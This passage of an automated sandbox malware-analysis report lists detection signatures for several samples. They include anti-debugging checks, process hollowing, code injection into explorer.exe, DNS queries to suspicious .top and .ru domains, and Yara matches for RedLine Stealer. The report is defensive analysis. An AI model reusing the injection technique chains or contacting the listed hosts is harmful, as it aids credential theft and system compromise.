                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2E14 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFE3F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C63D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B580E21 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5736CC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ED6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5716E0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5576E2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C46A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2EA3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B567D50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F8D47 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F3D40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F51D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618D34 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54AD30 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFDD3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5415C1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F8DF1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5795EC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543591 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5735A1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C75 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B585C70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618450 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56746D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B544439 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B618C14 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B57BC2C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B542CDB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B6014FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B618CD6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B619CB3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B541480 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B544CB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B57D4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\21.exe -- Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exe -- Process queried: DebugPort
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B576B90 rdtsc
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Code function: 3_1_004026C8 LdrLoadDll,
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Memory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Code function: 0_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Code function: 14_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Code function: 14_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion:

                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exe -- Domain query: iyc.jelikob.ru
                Source: C:\Windows\explorer.exe -- Domain query: xacokuo8.top
                Source: C:\Windows\explorer.exe -- Domain query: znpst.top
                Source: C:\Windows\explorer.exe -- Network Connect: 216.128.137.31 80
                Source: C:\Windows\explorer.exe -- Domain query: nusurtal4f.net
                Source: C:\Windows\explorer.exe -- Domain query: privacytoolzforyou-6000.top
                Source: C:\Windows\explorer.exe -- Domain query: hajezey1.top
                Source: C:\Windows\explorer.exe -- Domain query: sysaheu90.top
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exe -- File created: C066.exe.10.dr
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\21.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\21.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Injects a PE file into a foreign process
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Thread created: C:\Windows\explorer.exe EIP: 4DE1920
                Source: C:\Users\user\AppData\Local\Temp\21.exe -- Thread created: unknown EIP: 2D61920
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Thread created: unknown EIP: 5B71920
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Thread created: unknown EIP: 5AB19C0
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exe -- Thread created: unknown EIP: 5B01920
                Sample uses process hollowing technique
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base address: 400000
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\21.exe -- Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtb -- Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe -- Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe -- Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp -- Binary or memory string: Program Manager
                Source: explorer.exe, 0000000A.00000000.297627398.0000000000B68000.00000004.00000020.sdmp -- Binary or memory string: Progman\Pr
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp -- Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp -- Binary or memory string: Progman
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp -- Binary or memory string: Progmanlock
                Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp -- Binary or memory string: Shell_TrayWndh
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Queries volume information: C:\Users\user\AppData\Local\Temp\B096.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\B096.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Users\user\AppData\Local\Temp\BBE1.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                Source: C:\Windows\explorer.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\Md0q201V1D.exe -- Code function: 0_2_00421CF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe -- Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

                Stealing of Sensitive Information:

                Yara detected RedLine Stealer
                Source: Yara match -- File source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
